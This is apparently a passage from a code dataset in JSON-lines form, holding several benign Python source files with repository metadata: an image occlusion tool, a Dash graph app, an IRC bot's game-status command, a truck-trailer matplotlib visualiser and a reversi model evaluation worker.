occultation_factor\n\n #original image\n pixels = get_pixels(im)\n image_pixels, obj_pixels = get_image_object_pixels(pixels)\n obj_to_image_proportion_0 = get_percentage_obj_img(image_pixels, obj_pixels)\n\n try:\n x,y = get_random_point_on_object(image_pixels)\n except Exception:\n #we might not find a point on the object (happens if the whole image is transparent) -> should be deleted from training set\n print(\"ERROR: {} does not contain any information\".format(image))\n continue\n\n draw_ellipse_on_img(im, radius, x, y)\n\n #img with ellipse drawn on it\n pixels = get_pixels(im)\n image_pixels, obj_pixels = get_image_object_pixels(pixels)\n obj_to_image_proportion_1 = get_percentage_obj_img(image_pixels, obj_pixels)\n percentage_occultation = calc_percentage_occultation(obj_to_image_proportion_0, obj_to_image_proportion_1)\n\n proportions.append([image, obj_to_image_proportion_0, obj_to_image_proportion_1, percentage_occultation])\n\n # should be in form of mouse/3dw_378658fc-149c-4909-b924-e003a947c69b/rendering/10.png\n suffix = os.sep.join(image.split(os.sep)[-4:])\n img_path = os.path.join(save_path, suffix)\n if not os.path.exists(os.path.dirname(img_path)):\n os.makedirs(os.path.dirname(img_path))\n\n im.save(img_path,\"PNG\")\n\nexport_proportions(proportions)\n", "repo_name": "markuspaschi/ShapeNetTools", "sub_path": "DataSet_Tools/AddOcclusion/add_occlusion.py", "file_name": "add_occlusion.py", "file_ext": "py", "file_size_in_byte": 4471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.insert", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.savetxt", "line_number": 74, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 87, "usage_type": "name"}, {"api_name": "os.sep.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 120, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}]} +{"seq_id": "10181624478", "text": "#!/usr/bin/env python3\n\"\"\"\nDash Demonstration Project.\n\nCreate a graph and some fields to update the nodes.\n\"\"\"\n\nfrom graphtest.default_nodes import default_elements\nfrom graphtest.graph_viewer import GraphView\nfrom graphtest.inputs import Menu\n\n# Import the callbacks module so that the callbacks themselves be registered\nimport graphtest.callbacks\n\nfrom dash import Dash, html\n\n\nclass App:\n \"\"\"The Main Application.\"\"\"\n\n def __init__(\n self,\n elements: dict = default_elements,\n port: int = 8050,\n hostname: str = \"localhost\",\n ):\n \"\"\"\n Create the application.\n\n @param elements: Elements to populate the graph.\n @param port: Port the server should bind to\n @param hostname: Hostname the server should bind to\n \"\"\"\n self.app = Dash(__name__, title=\"Graph Visualisation App\")\n self.hostname = hostname\n self.port = port\n\n self.app.layout = html.Div(\n [\n GraphView(elements),\n html.Div(\n Menu(\n input_text=[\n \"Selected Node\",\n \"Property 1\",\n \"Property 2\",\n \"Property 3\",\n ],\n button_text=\"Update\",\n ),\n className=\"form-menu\",\n ),\n ],\n className=\"main-container\",\n )\n\n def run(self, debug=False):\n \"\"\"\n Run the server.\n\n @param debug: If true, Start server in debug mode\n \"\"\"\n self.app.run(debug=debug)\n\n def get_server(self):\n return self.app.server\n", "repo_name": "EmmanuelPauchard/graph-view", "sub_path": "graphtest/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "graphtest.default_nodes.default_elements", "line_number": 23, "usage_type": "name"}, {"api_name": "dash.Dash", "line_number": 34, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 38, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 38, "usage_type": "name"}, {"api_name": "graphtest.graph_viewer.GraphView", "line_number": 40, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 41, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 41, "usage_type": "name"}, {"api_name": "graphtest.inputs.Menu", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "43393432407", "text": "import urllib2\nimport json\n\ndef on_load(bot):\n bot.add_command('status', status)\n\ndef on_exit(bot):\n bot.del_command('status')\n\ndef status(bot, user, channel, args):\n if len(args) < 1:\n return\n\n shard = 'http://status.leagueoflegends.com/shards/'\n\n region = args[0].lower()\n\n full_url = shard + region\n\n response = urllib2.urlopen(full_url)\n\n json_response = response.read()\n\n incidents = json_response.count(\"content\") - 1\n\n readable_json = json.loads(json_response)\n\n try:\n content = str(readable_json['services'][1]['incidents'][0]['updates'][0]['content'].encode('utf8'))\n except:\n content = \"There are no reported issues at this time.\"\n\n content_replace = content.replace('\\r\\n', \"\")\n\n bot.send_msg(channel, \"%s Server Status: %s\" % (region.upper(), content_replace))\n", "repo_name": "devzspy/Brisingr", "sub_path": "mod_status.py", "file_name": "mod_status.py", "file_ext": "py", "file_size_in_byte": 836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib2.urlopen", "line_number": 20, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "17510435325", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n##################################################################################################################\n# Visualize_combination() #\n# #\n# This class initialises the visualisation of of a truck with a variable number of trailers #\n# Inputs: visualisation_shapes array provided by the method load_shapes(number_trailers) #\n# Outputs: _ #\n# Methods: run(visualisation_element) #\n# #\n# run(visualisation_element) #\n# This method is used to plot the combination consisting of a truck and possible trailers #\n# Inputs: visualisation_element array with the following 8 elements: #\n# #\n# truck_translation absolute translation of the truck #\n# truck_rotation absolute rotation of the truck, value in degrees #\n# first_trailer_rotation relative rotation of the first trailer to the truck, value in degrees #\n# second_trailer_rotation relative rotation of the second trailer to the first trailer, value in degrees #\n# steering_percentage steering angle of the truck, value between -1 and 1 #\n# destination_translation absolute translation of the destination #\n# destination_rotation absolute rotation of the destination, value in degrees #\n# number_trailers number of trailers, value between 0 and 2 #\n# Outputs: _ #\n##################################################################################################################\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\nfrom matplotlib import transforms\nimport numpy as np\n#from IPython import get_ipython\n#get_ipython().run_line_magic('matplotlib', 'qt')\n\n__author__ = \"Pär-Love Palm, Felix Steimle, Jakob Wadman, Veit Wörner\"\n__credits__ = [\"Pär-Love Palm\", \"Felix Steimle\", \"Jakob Wadman\", \"Veit Wörner\"]\n__license__ = \"GPL\"\n__version__ = \"0.9b\"\n__maintainer__ = \"Veit Wörner\"\n__email__ = \"veit@student.chalmers.se\"\n__status__ = \"Production\"\n\nclass Visualize_combination():\n def __init__(self,visualisation_shapes):\n \n self.yard_shape,\\\n self.drive_wheel_shape,\\\n self.hitch_radius,\\\n self.item_translations_truck,\\\n self.truck_shape,\\\n self.cab_shape,\\\n self.wheel_shape,\\\n self.rotation_center_truck,\\\n self.item_steering_rotations_truck,\\\n self.hitch_translation_truck,\\\n self.wheelbase_truck,\\\n self.maximal_steering_angle,\\\n self.item_translations_first_trailer,\\\n self.first_trailer_shape,\\\n self.shaft_shape,\\\n self.rotation_center_first_trailer,\\\n self.item_steering_rotations_first_trailer,\\\n self.hitch_translation_first_trailer_truck,\\\n self.hitch_translation_first_trailer_second_trailer,\\\n self.item_translations_second_trailer,\\\n self.second_trailer_shape,\\\n self.rotation_center_second_trailer,\\\n self.item_steering_rotations_second_trailer,\\\n self.hitch_translation_second_trailer,\\\n self.maximal_first_trailer_rotation,\\\n self.maximal_second_trailer_rotation,\\\n self.maximal_both_trailers_rotation= visualisation_shapes\n \n plt.ion()\n visualisation_figure = plt.figure(figsize=(10,10))\n self.ax = visualisation_figure.add_subplot(111, aspect='equal')\n self.ax.axes.get_xaxis().set_visible(False)\n self.ax.axes.get_yaxis().set_visible(False)\n plt.xlim(0, self.yard_shape[0])\n plt.ylim(0, self.yard_shape[1])\n plt.show()\n \n self.pause_time = 0.01\n\n def run(self,visualisation_element):\n \n for old_element in reversed(self.ax.patches):\n old_element.remove()\n \n truck_translation,\\\n truck_rotation,\\\n first_trailer_rotation,\\\n second_trailer_rotation,\\\n steering_percentage,\\\n destination_translation,\\\n destination_rotation,\\\n number_trailers = visualisation_element\n \n ## Destination plotting\n if number_trailers == 0:\n destination_rectangle = patches.Rectangle(-self.rotation_center_truck,\\\n self.truck_shape[0],\\\n self.truck_shape[1],\\\n color=\"red\",\\\n alpha=0.50)\n elif number_trailers == 2:\n destination_rectangle = patches.Rectangle(-self.rotation_center_second_trailer,\\\n self.second_trailer_shape[0],\\\n self.second_trailer_shape[1],\\\n color=\"red\",\\\n alpha=0.50)\n else:\n destination_rectangle = patches.Rectangle(-self.rotation_center_first_trailer,\\\n self.first_trailer_shape[0],\\\n self.first_trailer_shape[1],\\\n color=\"red\",\\\n alpha=0.50)\n \n rotation_destination = transforms.Affine2D().rotate_deg(destination_rotation)\n translation_destination = transforms.Affine2D().translate(destination_translation[0],\\\n destination_translation[1])\n destination_transformation = rotation_destination\\\n +translation_destination\\\n +self.ax.transData\n destination_rectangle.set_transform(destination_transformation)\n self.ax.add_patch(destination_rectangle)\n \n ## Truck plotting\n wheel_rectangles = []\n truck_everything = []\n truck_rectangle = patches.Rectangle(-self.rotation_center_truck,\\\n self.truck_shape[0],\\\n self.truck_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\n cab_rectangle = patches.Rectangle(-self.cab_shape/2,\\\n self.cab_shape[0],\\\n self.cab_shape[1],\\\n color=\"green\",\\\n alpha=0.50)\n drive_wheel_rectangles = [patches.Rectangle(-self.drive_wheel_shape/2,\\\n self.drive_wheel_shape[0],\\\n self.drive_wheel_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\\\n for drive_wheel_number in range(2)]\n wheel_rectangles = [patches.Rectangle(-self.wheel_shape/2,\\\n self.wheel_shape[0],\\\n self.wheel_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\\\n for wheel_number in range(5)]\n hitch_circle = patches.Circle((0, 0),\\\n self.hitch_radius,\\\n color=\"black\",\\\n alpha=0.50)\n truck_everything = [truck_rectangle]\\\n +[cab_rectangle]\\\n +[hitch_circle]\\\n +drive_wheel_rectangles\\\n +wheel_rectangles\n \n item_number = 0\n item_rotation = []\n item_translation = []\n for item_number in range(len(truck_everything)-1):\n # rotate wheels\n item_rotation = item_rotation\\\n +[transforms.Affine2D().rotate_deg(steering_percentage\\\n *self.maximal_steering_angle\\\n *self.item_steering_rotations_truck[item_number])]\n # translate wheels\n item_translation = item_translation\\\n +[transforms.Affine2D().translate(self.item_translations_truck[item_number,0],\\\n self.item_translations_truck[item_number,1])]\n # rotate truck with wheels\n rotation_everything = transforms.Affine2D().rotate_deg(truck_rotation)\n # translate truck with wheels\n translation_everything = transforms.Affine2D().translate(truck_translation[0],\\\n truck_translation[1])\n \n for item_number in range(len(truck_everything)-1):\n item_transformation = item_rotation[item_number]\\\n +item_translation[item_number]\\\n +rotation_everything\\\n +translation_everything\\\n +self.ax.transData\n truck_everything[item_number].set_transform(item_transformation)\n self.ax.add_patch(truck_everything[item_number])\n \n ## first_trailer plotting\n if number_trailers != 0:\n wheel_rectangles = []\n first_trailer_everything = []\n first_trailer_rectangle = patches.Rectangle(-self.rotation_center_first_trailer,\\\n self.first_trailer_shape[0],\\\n self.first_trailer_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\n shaft_rectangle = patches.Rectangle(-self.shaft_shape/2,\\\n self.shaft_shape[0],\\\n self.shaft_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\n wheel_rectangles = [patches.Rectangle(-self.wheel_shape/2,\\\n self.wheel_shape[0],\\\n self.wheel_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\\\n for wheel_number in range(5)]\n \n if number_trailers == 1:\n first_trailer_everything = [first_trailer_rectangle]\\\n +[shaft_rectangle]\\\n +wheel_rectangles\n \n if number_trailers == 2:\n hitch_circle = patches.Circle((0, 0),\\\n self.hitch_radius,\\\n color=\"black\",\\\n alpha=0.50)\n first_trailer_everything = [first_trailer_rectangle]\\\n +[shaft_rectangle]\\\n +[hitch_circle]\\\n +wheel_rectangles\n \n item_number = 0\n item_rotation = []\n item_translation = []\n for item_number in range(len(first_trailer_everything)-1):\n # rotate wheels\n item_rotation = item_rotation\\\n +[transforms.Affine2D().rotate_deg(-first_trailer_rotation\\\n *self.item_steering_rotations_first_trailer[item_number])]\n # translate wheels\n item_translation = item_translation\\\n +[transforms.Affine2D().translate(self.item_translations_first_trailer[item_number,0],\\\n self.item_translations_first_trailer[item_number,1])]\n # rotate first_trailer with wheels\n rotation_everything = transforms.Affine2D().rotate_deg(truck_rotation\\\n +first_trailer_rotation)\n # translate first_trailer with wheels\n translation_everything = transforms.Affine2D().translate(truck_translation[0]\\\n +self.hitch_translation_truck\\\n *np.cos(np.deg2rad(truck_rotation))\\\n -self.hitch_translation_first_trailer_truck\\\n *np.cos(np.deg2rad(truck_rotation\\\n +first_trailer_rotation)),\\\n truck_translation[1]\\\n +self.hitch_translation_truck\\\n *np.sin(np.deg2rad(truck_rotation))\\\n -self.hitch_translation_first_trailer_truck\\\n *np.sin(np.deg2rad(truck_rotation\\\n +first_trailer_rotation)))\n \n for item_number in range(len(first_trailer_everything)-1):\n item_transformation = item_rotation[item_number]\\\n +item_translation[item_number]\\\n +rotation_everything\\\n +translation_everything\\\n +self.ax.transData\n first_trailer_everything[item_number].set_transform(item_transformation)\n self.ax.add_patch(first_trailer_everything[item_number])\n \n ## second_trailer plotting \n if number_trailers == 2:\n wheel_rectangles = []\n second_trailer_everything = []\n second_trailer_rectangle = patches.Rectangle(-self.rotation_center_second_trailer,\\\n self.second_trailer_shape[0],\\\n self.second_trailer_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\n wheel_rectangles = [patches.Rectangle(-self.wheel_shape/2,\\\n self.wheel_shape[0],\\\n self.wheel_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\\\n for wheel_number in range(7)]\n second_trailer_everything = [second_trailer_rectangle]\\\n +wheel_rectangles\n \n item_number = 0\n item_rotation = []\n item_translation = []\n for item_number in range(len(second_trailer_everything)-1):\n # rotate wheels\n item_rotation = item_rotation\\\n +[transforms.Affine2D().rotate_deg(-second_trailer_rotation\\\n *self.item_steering_rotations_second_trailer[item_number])]\n # translate wheels\n item_translation = item_translation\\\n +[transforms.Affine2D().translate(self.item_translations_second_trailer[item_number,0],\\\n self.item_translations_second_trailer[item_number,1])]\n # rotate second_trailer with wheels\n rotation_everything = transforms.Affine2D().rotate_deg(truck_rotation\\\n +first_trailer_rotation\\\n +second_trailer_rotation)\n # translate second_trailer with wheels\n translation_everything = transforms.Affine2D().translate(truck_translation[0]\\\n +self.hitch_translation_truck\\\n *np.cos(np.deg2rad(truck_rotation))\\\n +(-self.hitch_translation_first_trailer_truck\\\n +self.hitch_translation_first_trailer_second_trailer)\\\n *np.cos(np.deg2rad(truck_rotation\\\n +first_trailer_rotation))\\\n -self.hitch_translation_second_trailer\\\n *np.cos(np.deg2rad(truck_rotation\\\n +first_trailer_rotation\\\n +second_trailer_rotation)),\\\n truck_translation[1]\\\n +self.hitch_translation_truck\\\n *np.sin(np.deg2rad(truck_rotation))\\\n +(-self.hitch_translation_first_trailer_truck\\\n +self.hitch_translation_first_trailer_second_trailer)\\\n *np.sin(np.deg2rad(truck_rotation\\\n +first_trailer_rotation))\\\n -self.hitch_translation_second_trailer\\\n *np.sin(np.deg2rad(truck_rotation\\\n +first_trailer_rotation\\\n +second_trailer_rotation)))\n \n for item_number in range(len(second_trailer_everything)-1):\n item_transformation = item_rotation[item_number]\\\n +item_translation[item_number]\\\n +rotation_everything\\\n +translation_everything\\\n +self.ax.transData\n second_trailer_everything[item_number].set_transform(item_transformation)\n self.ax.add_patch(second_trailer_everything[item_number])\n\n plt.pause(self.pause_time)\n", "repo_name": "MechatronixX/TrailerReverse", "sub_path": "visualisation/Visualize_combination_code.py", "file_name": "Visualize_combination_code.py", "file_ext": "py", "file_size_in_byte": 20263, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.ion", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.patches.Circle", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.patches.Circle", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 242, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 273, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 273, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 299, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 301, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 301, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}]} +{"seq_id": "19763485086", "text": "import os\nfrom logging import getLogger\nfrom random import random\nfrom time import sleep\n\nfrom reversi_zero.agent.model import ReversiModel\nfrom reversi_zero.agent.player import ReversiPlayer\nfrom reversi_zero.config import Config\nfrom reversi_zero.env.reversi_env import ReversiEnv, Player, Winner\nfrom reversi_zero.lib import tf_util\nfrom reversi_zero.lib.data_helper import get_next_generation_model_dirs\nfrom reversi_zero.lib.model_helpler import save_as_best_model, load_best_model_weight\n\nlogger = getLogger(__name__)\n\n\ndef start(config: Config):\n tf_util.set_session_config(per_process_gpu_memory_fraction=0.2)\n return EvaluateWorker(config).start()\n\n\nclass EvaluateWorker:\n def __init__(self, config: Config):\n \"\"\"\n\n :param config:\n \"\"\"\n self.config = config\n self.best_model = None\n\n def start(self):\n self.best_model = self.load_best_model()\n\n while True:\n ng_model, model_dir = self.load_next_generation_model()\n logger.debug(f\"start evaluate model {model_dir}\")\n ng_is_great = self.evaluate_model(ng_model)\n if ng_is_great:\n logger.debug(f\"New Model become best model: {model_dir}\")\n save_as_best_model(ng_model)\n self.best_model = ng_model\n self.remove_model(model_dir)\n\n def evaluate_model(self, ng_model):\n results = []\n winning_rate = 0\n for game_idx in range(self.config.eval.game_num):\n # ng_win := if ng_model win -> 1, lose -> 0, draw -> None\n ng_win, black_is_best, black_white = self.play_game(self.best_model, ng_model)\n if ng_win is not None:\n results.append(ng_win)\n winning_rate = sum(results) / len(results)\n logger.debug(f\"game {game_idx}: ng_win={ng_win} black_is_best_model={black_is_best} score={black_white} \"\n f\"winning rate {winning_rate*100:.1f}%\")\n if results.count(0) >= self.config.eval.game_num * (1-self.config.eval.replace_rate):\n logger.debug(f\"lose count reach {results.count(0)} so give up challenge\")\n break\n if results.count(1) >= self.config.eval.game_num * self.config.eval.replace_rate:\n logger.debug(f\"win count reach {results.count(1)} so change best model\")\n break\n\n winning_rate = sum(results) / len(results)\n logger.debug(f\"winning rate {winning_rate*100:.1f}%\")\n return winning_rate >= self.config.eval.replace_rate\n\n def play_game(self, best_model, ng_model):\n env = ReversiEnv().reset()\n\n best_player = ReversiPlayer(self.config, best_model, play_config=self.config.eval.play_config)\n ng_player = ReversiPlayer(self.config, ng_model, play_config=self.config.eval.play_config)\n best_is_black = random() < 0.5\n if best_is_black:\n black, white = best_player, ng_player\n else:\n black, white = ng_player, best_player\n\n observation = env.observation\n while not env.done:\n if env.next_player == Player.black:\n action = black.action(observation.black, observation.white)\n else:\n action = white.action(observation.white, observation.black)\n observation, info = env.step(action)\n\n ng_win = None\n if env.winner == Winner.black:\n if best_is_black:\n ng_win = 0\n else:\n ng_win = 1\n elif env.winner == Winner.white:\n if best_is_black:\n ng_win = 1\n else:\n ng_win = 0\n return ng_win, best_is_black, observation.number_of_black_and_white\n\n def load_best_model(self):\n model = ReversiModel(self.config)\n load_best_model_weight(model)\n return model\n\n def load_next_generation_model(self):\n rc = self.config.resource\n while True:\n dirs = get_next_generation_model_dirs(self.config.resource)\n if dirs:\n break\n logger.info(f\"There is no next generation model to evaluate\")\n sleep(60)\n model_dir = dirs[-1] if self.config.eval.evaluate_latest_first else dirs[0]\n config_path = os.path.join(model_dir, rc.next_generation_model_config_filename)\n weight_path = os.path.join(model_dir, rc.next_generation_model_weight_filename)\n model = ReversiModel(self.config)\n model.load(config_path, weight_path)\n return model, model_dir\n\n def remove_model(self, model_dir):\n rc = self.config.resource\n config_path = os.path.join(model_dir, rc.next_generation_model_config_filename)\n weight_path = os.path.join(model_dir, rc.next_generation_model_weight_filename)\n os.remove(config_path)\n os.remove(weight_path)\n os.rmdir(model_dir)\n", "repo_name": "mokemokechicken/reversi-alpha-zero", "sub_path": "src/reversi_zero/worker/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 4899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 658, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "reversi_zero.config.Config", "line_number": 17, "usage_type": "name"}, {"api_name": "reversi_zero.lib.tf_util.set_session_config", "line_number": 18, "usage_type": "call"}, {"api_name": "reversi_zero.lib.tf_util", "line_number": 18, "usage_type": "name"}, {"api_name": "reversi_zero.config.Config", "line_number": 23, "usage_type": "name"}, {"api_name": "reversi_zero.lib.model_helpler.save_as_best_model", "line_number": 40, "usage_type": "call"}, {"api_name": "reversi_zero.env.reversi_env.ReversiEnv", "line_number": 67, "usage_type": "call"}, {"api_name": "reversi_zero.agent.player.ReversiPlayer", "line_number": 69, "usage_type": "call"}, {"api_name": "reversi_zero.agent.player.ReversiPlayer", "line_number": 70, "usage_type": "call"}, {"api_name": "random.random", "line_number": 71, "usage_type": "call"}, {"api_name": "reversi_zero.env.reversi_env.Player.black", "line_number": 79, "usage_type": "attribute"}, {"api_name": "reversi_zero.env.reversi_env.Player", "line_number": 79, "usage_type": "name"}, {"api_name": "reversi_zero.env.reversi_env.Winner.black", "line_number": 86, "usage_type": "attribute"}, {"api_name": "reversi_zero.env.reversi_env.Winner", "line_number": 86, "usage_type": "name"}, {"api_name": "reversi_zero.env.reversi_env.Winner.white", "line_number": 91, "usage_type": "attribute"}, {"api_name": "reversi_zero.env.reversi_env.Winner", "line_number": 91, "usage_type": "name"}, {"api_name": "reversi_zero.agent.model.ReversiModel", "line_number": 99, "usage_type": "call"}, {"api_name": "reversi_zero.lib.model_helpler.load_best_model_weight", "line_number": 100, 